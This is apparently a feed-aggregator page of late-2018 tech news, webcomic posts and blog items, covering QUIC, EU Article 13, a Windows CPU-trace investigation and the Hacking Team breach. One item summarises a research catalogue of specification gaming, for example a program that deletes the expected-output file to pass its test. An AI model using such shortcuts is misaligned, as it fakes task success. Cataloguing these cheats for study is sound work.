The Real Deal On HIV, PrEP, and PEP via Scarleteen
The STI Files: Human Immunodeficiency Virus (HIV) via Scarleteen
Positively Informed: An HIV/AIDS Roundup via Scarleteen
PrEP and HIV via Planned Parenthood
hiv.gov

07:28

The Targaryens [LFG Comics]

I grew up with cats. I know cats, I freaking love cats. To me, they’ll always be the perfect pet (until the apocalypse, at which point I plan on training some type of rhino). Unfortunately, my wife is rather allergic […]

The post The Targaryens appeared first on Looking For Group.

1242 [LFG Comics]

The post 1242 appeared first on Looking For Group.

For Your Tabletop RPGs! [LFG Comics]

Let me tell you a story. In the very back of our office, past my office, right through the bullpen, the conference room, the kitchen, the break room, the sales, and IT dept, is a door. If you open that […]

The post For Your Tabletop RPGs! appeared first on Looking For Group.

Hardly Working [LFG Comics]

I have to tell you, this thing where I get to be in the office and not worry about working ahead for my next trip is quite enjoyable. To add to that joy, 66% of my kids now remember who […]

The post Hardly Working appeared first on Looking For Group.

What’s To Watch [LFG Comics]

 I haven’t done one of these in a while, but considering I’m having issues writing the last verse to this song and I’m looking for a way to procrastinate while still appearing to be working; Here’s what I’m currently watching- […]

The post What’s To Watch appeared first on Looking For Group.

05:56

Pretweets [Diesel Sweeties webcomic by rstevens]

this is a diesel sweeties comic strip

Tonight's comic wants to go back in time to before social media. Please like and subscribe.

04:28

Link [Scripting News]

William Gibson: "Very little 20th Century sf anticipated anything even remotely like what we must now recognize as the greatest single unanticipated effect of human technology."

02:56

02:00

The next version of HTTP won't be using TCP [OSNews]

The next version of HTTP, as agreed upon by the Internet Engineering Taskforce, is going to make some big changes.

In its continued efforts to make Web networking faster, Google has been working on an experimental network protocol named QUIC: "Quick UDP Internet Connections." QUIC abandons TCP, instead using its sibling protocol UDP (User Datagram Protocol). UDP is the "opposite" of TCP; it's unreliable (data that is sent from one end may never be received by the other end, and the other end has no way of knowing that something has gone missing), and it is unordered (data sent later can overtake data sent earlier, arriving jumbled up). UDP is, however, very simple, and new protocols are often built on top of UDP. QUIC reinstates the reliability and ordering that TCP has but without introducing the same number of round trips and latency. For example, if a client is reconnecting to a server, the client can send important encryption data with the very first packet, enabling the server to resurrect the old connection, using the same encryption as previously negotiated, without requiring any additional round trips.

I am ashamed to admit that I actually know remarkably little of how the core technologies underpinning the internet and the world wide web actually work. It's apparently so well-designed and suited for its task that few of us ever really have to stop and think about how it all works - but when you do, it kind of feels like magic how all of our computers, smartphones, and other connected devices just talk to each other and every little packet of data gets sent to exactly the right place.

00:28

Why Intel processors draw more power than expected [OSNews]

One of the recent topics permeating through the custom PC space recently has been about power draw. Intel's latest eight-core processors are still rated at a TDP of 95W, and yet users are seeing power consumption north of 150-180W, which doesn't make much sense. In this guide, we want to give you a proper understanding why this is the case, and why it gives us reviewers such a headache.

A detailed look at this nebulous topic by AnandTech.

Improving DuckDuckGo [OSNews]

At DuckDuckGo, we do not collect or share any personal information. That's our privacy policy in a nutshell. For example, we do not store IP addresses, and we do not create unique cookies. As such, we do not even have the ability to create search histories or search sessions for any individual - privacy by design. At the same time, we need a way to reliably improve our products for our users in an anonymous way. There are a few methods we've developed to achieve this.

Spoiler alert: it doesn't involve collecting user data.

Monday, 12 November

23:14

[$] C library system-call wrappers, or the lack thereof [LWN.net]

User-space developers may be accustomed to thinking of system calls as direct calls into the kernel. Indeed, the first edition of The C Programming Language described read() and write() as "a direct entry into the operating system". In truth, user-level "system calls" are just functions in the C library like any other. But what happens when the developers of the C library refuse to provide access to system calls they don't like? The result is an ongoing conflict that has recently flared up again; it shows some of the difficulties that can arise when the system as a whole has no ultimate designer and the developers are not talking to each other.

22:56

iSH: an iOS Linux shell for your iPhone or iPad [OSNews]

Have you ever wanted to run a Linux shell on your iOS device to transfer files, write shell scripts, or simply to use Vi to develop code or edit files? Now you can, with a project called iSH that is currently available as a TestFlight beta for iOS devices. iSH is a project that aims to bring a Linux shell to iOS devices using a usermode x86 emulator. iSH is built on the Alpine Linux distro, which is designed to have a small footprint, be secure, and easy to use with little or no distracting bells and whistles.

Neat and useful project. Let's hope it eventually gets approved for App Store distribution.

21:42

View From a Hotel Window, 11/12/18: San Diego [Whatever]

And the weather is perfect, because it’s San Diego and why wouldn’t it be.

Tonight: Come see me and Cixin Liu at the Clarke Center for Human Imagination as we talk about our work, worldbuilding, and all manner of things science fictional! Here are the details. We’d love to see you there!

21:21

Nintendo ‘Wins’ $12 Million From Pirate ROM Site Operators [TorrentFreak]

This summer, Nintendo made it totally clear that websites offering access to its retro-games and ROMs will not be tolerated.

The Japanese game developer filed a complaint at a federal court in Arizona, accusing LoveROMS.com and LoveRETRO.co of massive copyright and trademark infringement.

Faced with millions of dollars in potential damages, the operator of the sites, Jacob Mathias, swiftly took the platforms offline. The legal action also led to the shutdown several other ROM sites, who feared they could be next.

It quickly became clear that the Mathias and his wife, who was later added to the complaint, were not looking forward to a drawn-out legal battle. Instead, they engaged in settlement discussions with Nintendo, hoping to resolve the matter without too much bloodshed.

Today we can report that both sides have indeed reached a deal. They agreed to a consent judgment and a permanent injunction that will resolve all outstanding disputes.

Paperwork obtained by TorrentFreak shows that Mathias and his wife admit that their involvement with the websites constituted direct and indirect copyright and trademark infringement, which caused Nintendo irreparable injury.

However, on paper, the married couple won’t be getting off cheaply. On the contrary, they actually agreed to a judgment that exceeds $12 million.

“Plaintiff is hereby awarded judgment against all Defendants, jointly and severally, in the amount of $12,230,000,” the proposed language reads.

Unsigned final judgment

It seems unlikely that the couple has this kind of money in the bank, or that a jury would have reached a similar figure. So why the high amount?

We can only speculate but it’s possible that Nintendo negotiated such a high number, on paper, to act as a deterrent for other site operators. In practice, the defendants could end up paying much less.

It wouldn’t be the first time that a judgment in court is more than what the parties agreed to privately. This happened before in the MPAA’s lawsuit against Hotfile, where a $80 million judgment in court translated to $4 million behind the scenes settlement.

In addition to the monetary judgment, both parties also agreed on a permanent injunction. This will prevent the couple from infringing Nintendo’s copyrights going forward.

They further have to hand over all Nintendo games and emulators they have, at their own expense. On top of that, the permanent injunction requires them to sign over LoveROMs.com and LoveRETRO.co to the Japanese company.

The documents have yet to be signed off by a judge but considering that both parties agree with it, that should be a formality. After that, it’s game over.

Here are copies of the yet-to-be-signed permanent injunction (pdf) and final judgment (pdf).

LoveROMS

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

20:49

The Humble Book Bundle: Do-It-Yourself by Make:! Don’t let... [Humble Bundle Blog]



The Humble Book Bundle: Do-It-Yourself by Make:! 

Don’t let your dreams be dreams. Just DO IT with this book bundle from Maker Media! Get titles like Make: Musical Inventions, Make: Tips and Tales from the Workshop, and Make: Fun!. Plus, your purchase will support Maker Education!


Assets for Press and Partners

Link [Scripting News]

I've been making a lot of phone calls lately on my iPhone (6, iOS 12.1), and the volume on the calls is way too low. I have to force the phone to my ear and it still needs to be louder. I've turned the volume on the phone all the way up. What can I do? (Update: Heres'a a list of things I tried. I think the volume went up. I'll find out for sure on my next phone conversation.)

19:56

The Never Now [Scenes From A Multiverse]

I wanted to do a comic about comics control but it’s too soon to talk about comics. Not after comics killed all those students.

It’s not too soon to be ordering your holiday gifts from our store, though! Get it done now and you can spend the next two months blissfully drunk.

New Guest Blogger: Heather Child [Charlie's Diary]

Hello everyone, and apologies for the lack of activity here lately!

I'd like to introduce you to our new guest blogger, Heather Child. Heather is a Bristol, UK based author who has worked in non-profit marketing for the last twelve years, coming into close contact with the digital automation and personalisation technologies that herald the 'big data' age. Everything About You is her debut novel, published by Orbit Books (US edition here); her second novel, The Undoing of Arlo Knott, is due in July 2019. You can find out more at www.heather-child.co.uk. And/ I'm very pleased to say that she'll be posting here later this week.

19:28

A catalog of ingenious cheats developed by machine-learning systems [Cory Doctorow – Boing Boing]

When you train a machine learning system, you give it a bunch of data -- a simulation, a dataset, etc -- and it uses statistical methods to find a way to solve some task: land a virtual airplane, recognize a face, match a block of text with a known author, etc.

Like the mischievous genies of legend, machine learning systems will sometimes solve your problems without actually solving them, exploiting loopholes in the parameters you set to find shortcuts to the outcome you desired: for example, if you try to train a machine learning system to distinguish poisonous and non-poisonous mushrooms by alternating pictures of each, it might learn that all odd-numbered data-points represent poisonous mushrooms, and ignore everything else about the training data.

Victoria Krakovna's Specification gaming examples in AI is a project to identify these cheats. It's an incredibly fun-to-read document, a deep and weird list of all the ways that computers find loopholes in our thinking. Some of them are so crazy-clever that it's almost impossible not to impute perverse motives to the systems involved.

* A robotic arm trained to slide a block to a target position on a table achieves the goal by moving the table itself.

* Game-playing agent accrues points by falsely inserting its name as the author of high-value items

* Creatures exploited physics simulation bugs by twitching, which accumulated simulator errors and allowed them to travel at unrealistic speeds

* In an artificial life simulation where survival required energy but giving birth had no energy cost, one species evolved a sedentary lifestyle that consisted mostly of mating in order to produce new children which could be eaten (or used as mates to produce more edible children).

* Genetic algorithm is supposed to configure a circuit into an oscillator, but instead makes a radio to pick up signals from neighboring computers

* Genetic debugging algorithm GenProg, evaluated by comparing the program's output to target output stored in text files, learns to delete the target output files and get the program to output nothing. Evaluation metric: “compare youroutput.txt to trustedoutput.txt”. Solution: “delete trusted-output.txt, output nothing”

* AI trained to classify skin lesions as potentially cancerous learns that lesions photographed next to a ruler are more likely to be malignant.

* Genetic algorithms for image classification evolves timing attack to infer image labels based on hard drive storage location

Specification gaming examples in AI [Victoria Krakovna/Google Spreadsheets]

(via Kottke)

19:14

Page 51 [Flipside]

Page 51 is done.

News Post: No Thank U [Penny Arcade]

Tycho: Gwob was talking about Adventure Mode before, and how savory it is, and how it’s mostly new to us because a substantial amount of our Diablo 3 play was back when it still had a cash store.  I have a real challenge with games of the “loot-‘em-up” variety, and it’s whenever I get to “the desert level.”  It has an almost total ability to sunder my momentum, even for a game I’m nuts about.  Whenever they make me start trudgin’ through some kinda Goddamn dunes or some shit I’m audi.  I’m not proud of it or…

17:42

Comic: No Thank U [Penny Arcade]

New Comic: No Thank U

Link [Scripting News]

Earlier today I wrote a tweet that started getting a lot of flow. Then I thought this is possibly something Jay Rosen could endorse. So I sent an email, he RTd and then the flow went up quite a bit more. I noted, again via email: "If your influence keeps growing, you could probably solve some of journalism's problems just with your flow." I was thinking of picking out voices that weren't being heard in the journalism-centered conversations but if they were, might adjust how it covers the changed world as we find it today. 💥

17:21

Today in GPF History for Monday, November 12, 2018 [General Protection Fault: The Comic Strip]

Trish is overwhelmed as Ki tries to catch her up on all that's happened to her...

16:28

Security updates for Monday [LWN.net]

Security updates have been issued by Arch Linux (curl, lib32-curl, lib32-libcurl-compat, lib32-libcurl-gnutls, libcurl-compat, libcurl-gnutls, systemd, and thunderbird), Debian (ansible, ghostscript, qemu, thunderbird, and xen), Fedora (community-mysql, gettext, links, mysql-connector-java, xen, and zchunk), Gentoo (icecast, libde265, okular, pango, and PHProjekt), Mageia (ansible, audiofile, iniparser, libtiff, mercurial, opencc, and python-dulwich), openSUSE (accountsservice, apache2, audiofile, curl, libarchive, ntfs-3g_ntfsprogs, opensc, python, python-base, qemu, soundtouch, and systemd), Oracle (git, java-1.7.0-openjdk, java-11-openjdk, kernel, python-paramiko, thunderbird, and xorg-x11-server), Red Hat (rh-git29-git), Scientific Linux (thunderbird), SUSE (kernel), and Ubuntu (gettext and libmspack).

Youtube CEO: it will be impossible to comply with the EU's new Copyright Directive (adios, Despacito!) [Cory Doctorow – Boing Boing]

Under Article 13 of the new EU Copyright Directive, it will no longer be enough for online platforms to remove materials if someone claims they infringe copyright; instead, the platforms will have to prevent the display of any copyrighted material that has not been explicitly licensed for distribution.

In a new blog post, Youtube CEO Susan Wojcicki continues her series of posts about the impossibility of complying with this rule.

Wojcicki considers the example of Youtube's all-time most popular video, Despacito, which has been cleared for Youtube by its creator, but whose "multiple copyrights" include some works whose proprietors are unknown or disputed. Under Article 13, Youtube would be expected to censor this video and deny the creators involved the opportunity to earn the small fortune in ad revenue that Youtube has paid them, as well as access to the 5.6 billion (!) viewings the video has received.

The consequences of article 13 go beyond financial losses. EU residents are at risk of being cut off from videos that, in just the last month, they viewed more than 90bn times. Those videos come from around the world, including more than 35m EU channels, and they include language classes and science tutorials as well as music videos. We welcome the chance to work with policymakers and the industry to develop a solution within article 13 that protects rights holders while also allowing the creative economy to thrive. This could include more comprehensive licensing agreements, collaboration with rights holders to identify who owns what, and smart rights management technology, similar to Content ID.

The Potential Unintended Consequences of Article 13 [Susan Wojcicki/Youtube Blog]

15:56

The case of the System process that consumed a lot of CPU [The Old New Thing]

A report came in through Feedback Hub that the System process was consuming high CPU. I was able to explain to the customer how to include a performance trace so the problem could be diagnosed.

In case you want to file a performance issue, the way to include a performance trace is to go to the Additional details section and click the Recreate my problem button. You will get additional options:

To help us understand what is causing the problem, please try to make it happen again while we follow along and capture data.
Include data about Performance
Include screenshots of each step
You will be able to review and edit the data before sending it.
⏱
Start
capture

Check the Include data about box and select Performance as the category. Assuming the performance problem is ongoing, click Start capture and let it run for about 15 seconds, then click Stop capture. (If the performance problem occurs only when you perform a certain activity, then click Start capture, then do the activity that creates the performance issue, and then click Stop capture.)

That creates a performance trace that will be attached to your report.

Okay, let's open the performance trace that this customer included. The tool for this is the Windows Performance Analyzer.

Since the problem is high CPU, the natural place to start is the Computation graph, which shows CPU usage.

Computation

Yup, that sure looks like high CPU usage there.

Create an analysis page for that graph and zoom in to the period of high CPU. Here's what's using the CPU:

Line # Process Thread ID Stack Count % Weight
1 ▷ System 29,815 65.15
2 Idle 0 ▷ [Idle] 510 21.35
3 ▷ Taskmgr.exe (14412) 0.25
4 ▷ MsMpEng.exe (5180) 0.07

And indeed most of it is going to the System process with 65.15%. The Idle thread is a distant second with 21.35%, and everybody else is noise.

So let's dig into the System process.

Line # Process Thread ID Stack Count % Weight
1 ▼System (4) 29,815 65.15
2 9200 ▷[Root] 1,605 3.51
3 19708 ▷[Root] 1,576 3.44
4 ▷18748 1,361 2.97
5 17480 ▷[Root] 1,346 2.93
6 12132 ▷[Root] 1,341 2.93
7 13020 ▷[Root] 1,220 2.67
8 15064 ▷[Root] 1,181 2.58
9 16364 ▷[Root] 1,084 2.36
10 11376 ▷[Root] 1,058 2.31
11 20444 ▷[Root] 994 2.17
12 21000 ▷[Root] 978 2.14
13 20648 ▷[Root] 905 1.97
14 ▷19076 895 1.95
15 8572 ▷[Root] 757 1.65
16 13864 ▷[Root] 743 1.62
17 17072 ▷[Root] 685 1.50
18 16224 ▷[Root] 653 1.43
19 ▷15988 625 1.37
20 19592 ▷[Root] 604 1.32
21 1784 ▷[Root] 571 1.25
22 17872 ▷[Root] 560 1.22
&vellip &vellip &vellip &vellip &vellip

Hm, everything just flattens out. There's no big culprit sucking up all the CPU.

Are we being nibbled to death?

Let's look at two of those threads, maybe we'll discover something.

Line # Process Thread ID Stack Count % Weight
1 ▼System (4) 29,815 65.15
2 9200 [Root] 1,605 3.51
3 ntoskrnl.exe!KxStartSystemThread 1,605 3.51
4 |    ntoskrnl.exe!PspSystemThreadStartup 1,605 3.51
5 |    ntoskrnl.exe!ExpWorkerThread 1,605 3.51
6 |- ntoskrnl.exe!IopProcessWorkItem 1,554 3.40
7 |- ntoskrnl.exe!KeRemovePriQueue 50 0.11
8 |- ntoskrnl.exe!ExpWorkerThread<itself> 1 0.00
9 19708 [Root] 1,576 3.44
10 |- ntoskrnl.exe!KxStartSystemThread 1,574 3.44
11 |    ntoskrnl.exe!PspSystemThreadStartup 1,574 3.44
12 |    ntoskrnl.exe!ExpWorkerThread 1,574 3.44
13 |    |- ntoskrnl.exe!IopProcessWorkItem 1,538 3.36
14 |    |- ntoskrnl.exe!KeRemovePriQueue 36 0.08

Okay, it seems that the threads are doing Iop­Process­Work­Item. That explains why the work is so evenly spread out: It's a thread pool.

Remove the Thread ID column because we don't care about which thread is doing the work. Now we can group purely by stacks.

Line # Process Stack Count % Weight
1 System (4) 29,815 65.14
2 [Root] 29,810 65.13
3 |- ntoskrnl.exe!KxStartSystemThread 29,794 65.09
4 |    ntoskrnl.exe!PspSystemThreadStartup 29,794 65.09
5 |    ntoskrnl.exe!ExpWorkerThread 29,699 64.89
6 |    |- ntoskrnl.exe!IopProcessWorkItem 28,742 62.81
7 |    |- contoso.sys!<PDB not found> 28,707 62.74
8 |    |    |- contoso.sys!<PDB not found> 28,699 62.72
9 |    |    |    |- contoso.sys!<PDB not found> 28,588 62.48
10 |    |    |    |    |- ntoskrnl.exe!RtlWriteRegistryValue 28,572 62.44

Aha, basically all of the work items are going to the the Contoso driver, and that driver does very little work of its own. Of the 28,707 samples that showed that we were running a Contoso work item, 28,572 of them (over 99%) were in Rtl­Write­Registry­Value.

Basically, the Contoso driver was burning up all your CPU writing furiously to the registry.

The developers at Contoso replied that the customer was running a version of the driver that was over a year old. They suggested the customer upgrade to the latest driver and see if that fixes the problem.

I'm sure that upgrading to the latest driver will make the problem go away, but I'm not convinced that it'll fix the problem. Because what's probably happening is that the driver got into some sort of error state and is writing diagnostic information to the registry. That'll go away even if you don't upgrade the driver. All you have to do is reboot.

The real question is what sort of error state the driver managed to get itself into.

15:07

YouTube CEO Says That Videos May Be Blocked Due to EU Copyright Law [TorrentFreak]

Two years ago the European Commission announced plans to modernize EU copyright law.

Some of the proposals were hugely controversial. Article 13, for example, would see the liability for infringing content switched from users of sites like YouTube to the platform itself.

But, despite warnings, in September the European Parliament voted in favor of proposals put forward by Axel Voss’ EPP group.

This is a revised version of the original proposal, but one that would still pave the way for upload filters, to prevent infringing content from reaching sites like YouTube in the first place. However, speaking today in Financial Times (paywall), YouTube CEO Susan Wojcicki says that blocking videos may be the platform’s only option.

“While we support the goals of article 13, the European Parliament’s current proposal will create unintended consequences that will have a profound impact on the livelihoods of hundreds of thousands of people,” Wojcicki writes.

“The parliament’s approach is unrealistic in many cases because copyright owners often disagree over who owns what rights. If the owners cannot agree, it is impossible to expect the open platforms that host this content to make the correct rights decisions.”

Using the hit “Despacito” as an example, Wojcicki says that the track contains multiple copyrights including sound recording and publishing rights. YouTube has agreements with several parties to license the video but other rightsholders remain unknown. This could present a situation so complex that YouTube might have to stop hosting the video altogether.

“That uncertainty means we might have to block videos like this to avoid liability under article 13. Multiply that risk with the scale of YouTube, where more than 400 hours of video are uploaded every minute, and the potential liabilities could be so large that no company could take on such a financial risk,” she adds.

While the rest of the world appears to be safe from such blocking, YouTube’s CEO warns that it is EU residents that will be affected. During the last month alone, videos were viewed by citizens more than 90 billion times.

Wojcicki says her company wants to work with policymakers and the industry to develop Article 13 in a way that protects rightsholders but without stifling the creative economy. That might including broader licensing agreements, improved collaboration with rightsholders, and technical solutions, similar to Content ID.

“Platforms that follow these rules, and make a good effort to help rights holders identify their content, shouldn’t be held directly liable for every single piece of content that a user uploads,” Wojcicki writes.

“We ask policymakers to find a solution that protects rights holders and creators alike, and listen to the growing number of EU voices, including some member countries, who agree there’s a better way forward.”

In a report last week detailing how Google fights piracy, the company noted that between October 2017 to September 2018, YouTube had paid more than $1.8 billion to the music industry from in advertising revenue alone.

Last Friday, however, that figure was challenged by IFPI Chief Executive, Frances Moore.

“We welcome Google’s recognition that it and Google’s YouTube need to operate responsibly and properly value creators and their work. However, the figures in Google’s anti-piracy paper don’t match our own,” Moore said.

“It is difficult to get any clarity on Google’s claims as it doesn’t explain its methodology, but IFPI data shows that revenue returning to the record industry through video streaming services (including but not limited to YouTube) with 1.3 billion users amounted to US $856 million in 2017 – less than half of Google’s claim and less than US $1 per user per year.”

It seems clear that YouTube and the music industry are yet to see eye to eye on this problem but with the platform suggesting that blocking might be the only option, as we envisioned earlier, the pressure is increasing on supporters of Article 13 to avoid this worst-case scenario.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Mike Gabriel: Results produced while at "X2Go - The Gathering 2018" in Stuttgart [Planet Debian]

Over the last weekend, I have attended the FLOSS meeting "X2Go - The Gathering 2018" [1]. The event took place at the shackspace maker space in Ulmerstraße in Stuttgart-Wangen (near S-Bahn station S-Untertürkheim). Thanks to the people from shackspace for hosting us there, I highly enjoyed your location's environment. Thanks to everyone who joined us at the meeting. Thanks to all event sponsors (food + accomodation for me). Thanks to Stefan Baur for being our glorious and meticulous organizer!!!

Thanks to my family for letting me go for that weekend.

Especially, a big thanks to everyone, that I was allowed to bring our family dog "Capichera" with me to the event. While Capichera adapted quite ok to this special environment on sunny Friday and sunny Saturday, he was not really feeling well on rainy Sunday (aching joints, unwilling to move, walk interact).

For those interested and especially for our event sponsors, below you can find a list of produced results related to the gathering.

light+love
Mike

2018-11-09 Mike Gabriel (train ride + @ X2Go Gathering 2018)

  • X2Go: Port x2godesktopsharing to Qt5.
  • Arctica: Release librda 0.0.2 (upstream) and upload librda 0.0.2-1 to Debian unstable (as NEW).
  • Arctica: PR reviews and merges:
  • Arctica: Fix autobuilders (add libxkbfile-dev locally to the build systems' list of packages, required for latest nx-libs with xkb-1.3.0.0 branch merged).
  • Arctica: Fix (IMAKE_)FONT_DEFINES build logic in nx-libs (together with Ulrich Sibiller)
  • X2Go: Explain X2Go Desktop Sharing to one of the event sponsors.
  • Discuss various W-I-P branches in nx-libs and check their development status with the co-maintainers.
  • Debian: Upload to stretch-backports: mate-tweak 18.10.2-1~bpo9+1.
  • Debian: Upload to stretch-backports: mate-icon-theme 1.20.2-1~bpo9+1.

2018-11-10 - Mike Gabriel (@ X2Go Gathering 2018)

  • my tool chain: make my smtp_tunnel script more robust and specific about which autossh tunnel to take down. Add "up" and "down" as first argument, so now I can now also take down the autossh tunnel for SMTP (as opposed to doing killall autossh unspecifically).
  • Talks:
    • Discussion Slot - more general NX-Libs discussion (BIG-REQUESTS, Xinerama, Telekinesis)
    • Demo: Arctica Greeter with X2Go Logon
    • Demo/Discussion: Current state of the Python Broker, Feature Requests
    • Discussion Slot - more general NX-Libs discussion (Software rendering, OpenGL, GLX, … how is that all related? And would we be able to speed things up in a Telekinesis-like approach somehow?)
  • Cooking: : Prepare nearly vegan (the carrots had butter), organic Italian pasta (with salad and ciabatta bread) for the group. Together with Ritchi and Thomas. Much appreciation to plattsalat e.V. [2] for sponsoring the food.
  • PyHoca-CLI: Fix normal password authentication (i.e. for users that don't use SSH priv/pub keys).
  • Python X2Go / PyHoca-cli: Add check directly after authentication that exits with error, if the remote server has the X2Go Server software installed. Bail out, if not.
  • X2Go Consulting: Demo possible approach for having X2Go in the webbrowser again to Martti Pikanen.

2018-11-11 - Mike Gabriel (@ X2Go Gathering 2018 + train ride)

  • Debian: Port pinentry-x2go to Qt5, upload to unstable pinentry-x2go 0.7.5.9-3.
  • X2Go: Apply changes on top of pinentry-x2go 0.7.5.10 upstream.
  • Talks:
    • Quick introduction to librda.
  • Debian: Upload to unstable: mate-polkit 1.20.1-2.
  • X2Go: Work on x2godesktopsharing upstream:
    • allow system-wide default settings
    • store sharing group in settings (instead of hard-coding a POSIX group name)
    • rewrite the access grant/deny dialog
  • Debian: Prepare Debian package for x2godesktopsharing.
    • debconf: make the sharing group name selectable
    • debconf: auto-start desktop sharing
    • debconf: auto-activate desktop sharing when started

References

14:56

Italian prosecutors have given up on catching the person who hacked and destroyed Hacking Team [Cory Doctorow – Boing Boing]

Hacking Team (previously) was an Italian company that developed cyberweapons that it sold to oppressive government around the world, to be used against their own citizens to monitor and suppress political oppositions; in 2015, a hacker calling themselves "Phineas Fisher" hacked and dumped hundreds of gigabytes' worth of internal Hacking Team data, effectively killing the company.

Three years later, the Italian prosecutors who have been chasing Phineas Fisher have given up on unmasking them. On Motherboard, Lorenzo Franceschi-Bicchierai combines the contents of sealed court documents with interview with "Fisher" to reveal the tradecraft that kept Fisher safe from legal retaliation; the stupid mistakes that left Hacking Team vulnerable; and the sleazy tactics the company's CEO used to torment his former employees in the name of tracking down Fisher.

Fisher's ability to evade unmasking is largely attributable to their extreme caution and diligence: using tools like Tor to remain anonymous, and using stolen, hacked Bitcoin to buy the services and tools that Fisher used to penetrate Hacking Team's defenses.

The attack was only possible because David Vincenzetti, Hacking Team's founder and CEO, refused to upgrade his VPN software, forcing the IT workers at Hacking Team to keep older, legacy services running. One of the systems administrators who might have caught Fisher during their raids on Hacking Team's data was reportedly distracted by a weeks-long World of Warcraft binge, allowing Fisher to operate with impunity.

Meanwhile, the court documents reveal that Vincenzetti has pursued vendettas against former employees whom he falsely believed to be implicated in the hack, going so far as to frame them with false evidence. However, Vincenzetti was ultimately unsuccessful in his attempts to frame these workers.

According to the court documents, Pelliccione not only had nothing to do with the hack, but Hacking Team actively tried to frame him—and got caught. Vincenzetti told investigators that the company detected two attempts to attack Hacking Team coming from IP addresses in Malta, where Reaqta used to be based. In fact, the judge concluded, it was the other way around: someone inside Hacking Team connected to Reaqta’s network the day after the attack, in a clear—albeit clumsy—attempt to leave breadcrumbs pointing to Pelliccione. (The other alleged attack was months before the hack on the company, on May 13, 2015, when Hacking Team had already engaged private investigators to figure out whether Pelliccione and another former employee had stolen company secrets.)

The judge found that Pelliccione and fellow former employees Guido Landi, Mustapha Maanna, Serge Woon, and Alex Velasco are innocent. But also found that Phineas Fisher’s motives were “certainly political and ideological.”

When I asked the hacker what they thought about the ruling, they said that they always wanted to expose what they believe were the company’s shady dealings.

“Maybe now the prosecutors will have time to investigate the various crimes committed by Hacking Team,” Phineas Fisher told me recently, referring to the sale of Hacking Team spyware in Sudan, the company questionable hacking methods, and the sale to Mexican authorities who then used it to target dissidents. “But I don't have any illusions that prosecutors will look into any of that.”

Hacking Team Hacker Phineas Fisher Has Gotten Away With It [Lorenzo Franceschi-Bicchierai/Motherboard]

Wells Fargo: We can't be sued for lying to shareholders because it was obvious we were lying [Cory Doctorow – Boing Boing]

Wells Fargo has asked a court to block a shareholder lawsuit that seeks to punish the company for lying when it promised to promptly and completely disclose any new scandals; Wells Fargo claims that the promise was obvious "puffery," a legal concept the FTC has allowed to develop in which companies can be excused for making false claims if it should be obvious that they are lying (as when a company promises that they make "the best-tasting juice in America).

The lawsuit stems from Wells Fargo's crooked car-loan program that used deceptive tactics to defraud 800,000 customers, ultimately stealing 25,000 of their cars through fraudulent repossessions.

The shareholders argue that when Wells Fargo CEO Tim Sloan misled investors in 2016, when he said that he was "not aware" of lurking sales scandals (this was four years after the company's internal investigations revealed the car ripoffs and a year before they were made public after a leak to the New York Times).

The company argue that Sloan was making "generic statements...on which no reasonable investor could rely" and thus the shareholders should not be able to sue for the losses they suffered when the scandal became public.

In other words, as the LA Times's Michael Hiltzik puts it, "We can’t be sued because no one believed us anyway."

The shareholder lawsuit focuses on the efforts by Sloan and his fellow executives to conceal the auto-loan scandal from the public. While they were trying to clean up the splatter from the bank’s most prominent scandal, in which sales representatives secretly opened millions of accounts for consumers in order to meet punishing work quotas, the executives consistently stated that they were investigating high and low to make sure the bank was otherwise clean and would fully disclose anything they discovered.

“We want to leave no stone unturned,” Sloan told investment analysts during a conference call in January 2017. “If we find something that’s important, we’ll communicate that…. I think given our desire to be very transparent, we’ll probably err on the side of overcommunicating as opposed to undercommunicating.”

Yet by then, Sloan had received a report from the consulting firm Oliver Wyman that laid out the auto-loan scandal in great detail.

The scandal stayed out of the public eye until the Oliver Wyman report was leaked to the New York Times, which published a story about it July 27, 2017; Wells Fargo issued a news release fessing up to the matter that very day.

Wells Fargo says its promises to restore consumer trust were just ‘puffery.’ But they look more like lies [Michael Hiltzik/LA Times]

(via Naked Capitalism)

14:35

Link [Scripting News]

A request for news media. If the president makes a proclamation re something he has no power over, that's the story, if you want to report anything. If you carry his proclamation as if he had the power, you're colluding. His excuse is he's corrupt. What's your excuse?

14:14

Global antiquarian bookseller strike brings Amazon to its knees [Cory Doctorow – Boing Boing]

When Amazon division Abebooks -- the largest platform for antiquarian booksellers in the world -- announced it would blacklist stores in the Czech Republic, Poland, Hungary, South Korea and Russia, citing nebulous transaction-processing difficulties -- 600 antiquarian booksellers in 27 countries went on strike, withdrawing their 4,000,000 titles from Abebooks.

Two days later, Amazon reversed its policy and promised that booksellers in the affected countries would continue to be welcome on its platform.

Despite the victory, the lesson that some booksellers have taken away from the event is that Amazon does not have their interests at heart and that their efforts should be focused on selling off of Amazon's platform.

“AbeBooks was saying entire countries were expendable to its plans,” said Scott Brown, a Eureka, Calif., bookseller who was an organizer of the strike. “Booksellers everywhere felt they might be next.”

The matter was apparently resolved when Sally Burdon, an Australian bookseller who is president of the International League of Antiquarian Booksellers, spoke with Arkady Vitrouk, chief executive of AbeBooks. In a Wednesday email to her members after their talk, Ms. Burdon said Mr. Vitrouk apologized for the platform’s behavior “a number of times” and said booksellers in the affected countries would not be dropped as scheduled on Nov. 30.

“Arkady told us that ABE are very well aware of the mistake they have made,” she wrote in the email, which was viewed by The New York Times. “He stated that it was a ‘bad decision’ and that they deeply regret the hurt and harm they have caused.”

After Protest, Booksellers Are Victorious Against Amazon Subsidiary [David Streitfeld/New York Times]

(Image: Kheel Center , CC-BY)

(via Naked Capitalism)

New, "unbreakable" Denuvo DRM cracked two days before its first commercial deployment [Cory Doctorow – Boing Boing]

Denuvo bills itself as the best-of-breed in games DRM, the most uncrackable, tamper-proof wrapper for games companies; but its reputation tells a different story: the company's products are infamous for falling quickly to DRM crackers and for interfering with game-play until you crack the DRM off the products you buy.

The company's reputation for unjustifiable bragging is well-deserved: the latest iteration of Denuvo DRM is version 5.3, slated to launch with Hitman 2 on November 13th. But Hitman 2 leaked onto the internet yesterday, two days prior to its launch, and Denuvo 5.3 was cracked within hours -- two days before the official release.

The DRM was cracked by a group calling itself FCKDRM.

While several groups have been chipping away at Denuvo for some time, FCKDRM is a new entrant (at least by branding) to the cracking scene. Notably, FCKDRM isn’t a ‘Scene’ group but one that works in P2P circles. At least for now, their identities remain a secret but their choice of name is interesting.

FCKDRM is the official name for the anti-DRM initiative recently launched by GOG, a digital distribution platform for DRM-free video games and video.

